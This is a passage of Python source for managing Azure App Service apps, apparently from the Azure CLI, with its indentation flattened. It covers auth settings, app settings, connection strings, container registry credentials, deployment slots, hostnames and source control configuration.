if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise InvalidArgumentValueError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
def list_runtimes(cmd, os_type=None, linux=False):
if os_type is not None and linux:
raise MutuallyExclusiveArgumentError("Cannot use both --os-type and --linux")
if linux:
linux = True
windows = False
else:
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _StackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
return runtime_helper.get_stack_names_only(delimiter=":")
def list_function_app_runtimes(cmd, os_type=None):
# show both linux and windows stacks by default
linux = True
windows = True
if os_type == WINDOWS_OS_NAME:
linux = False
if os_type == LINUX_OS_NAME:
windows = False
runtime_helper = _FunctionAppStackRuntimeHelper(cmd=cmd, linux=linux, windows=windows)
linux_stacks = [r.to_dict() for r in runtime_helper.stacks if r.linux]
windows_stacks = [r.to_dict() for r in runtime_helper.stacks if not r.linux]
if linux and not windows:
return linux_stacks
if windows and not linux:
return windows_stacks
return {WINDOWS_OS_NAME: windows_stacks, LINUX_OS_NAME: linux_stacks}
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise ResourceNotFoundError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise ValidationError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise ArgumentUsageError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise ResourceNotFoundError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise ResourceNotFoundError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
from azure.mgmt.web.models import HostNameBinding
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None):
container_args = deployment_container_image_name or docker_registry_server_password or docker_registry_server_user
if container_args and not configuration_source:
raise ArgumentUsageError("Cannot use arguments --deployment-container_image_name, "
"--docker-registry-server_password, or --docker-registry-server-user without argument "
"--configuration-source")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise ResourceNotFoundError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise ValidationError("'{}' is a function app. Please use "
"`az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source,
deployment_container_image_name, docker_registry_server_password,
docker_registry_server_user,
docker_registry_server_url=docker_registry_server_url)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None):
container_args = deployment_container_image_name or docker_registry_server_password or docker_registry_server_user
if container_args and not configuration_source:
raise ArgumentUsageError("Cannot use arguments --deployment-container-image_name, "
"--docker-registry-server_password, or --docker-registry-server-user without argument "
"--configuration-source")
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise ResourceNotFoundError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source,
deployment_container_image_name, docker_registry_server_password,
docker_registry_server_user,
docker_registry_server_url=docker_registry_server_url)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None,
deployment_container_image_name=None, docker_registry_server_password=None,
docker_registry_server_user=None, docker_registry_server_url=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
if deployment_container_image_name or docker_registry_server_password or docker_registry_server_user:
update_container_settings(cmd, resource_group_name, webapp,
docker_custom_image_name=deployment_container_image_name, slot=slot,
docker_registry_server_user=docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password,
docker_registry_server_url=docker_registry_server_url)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
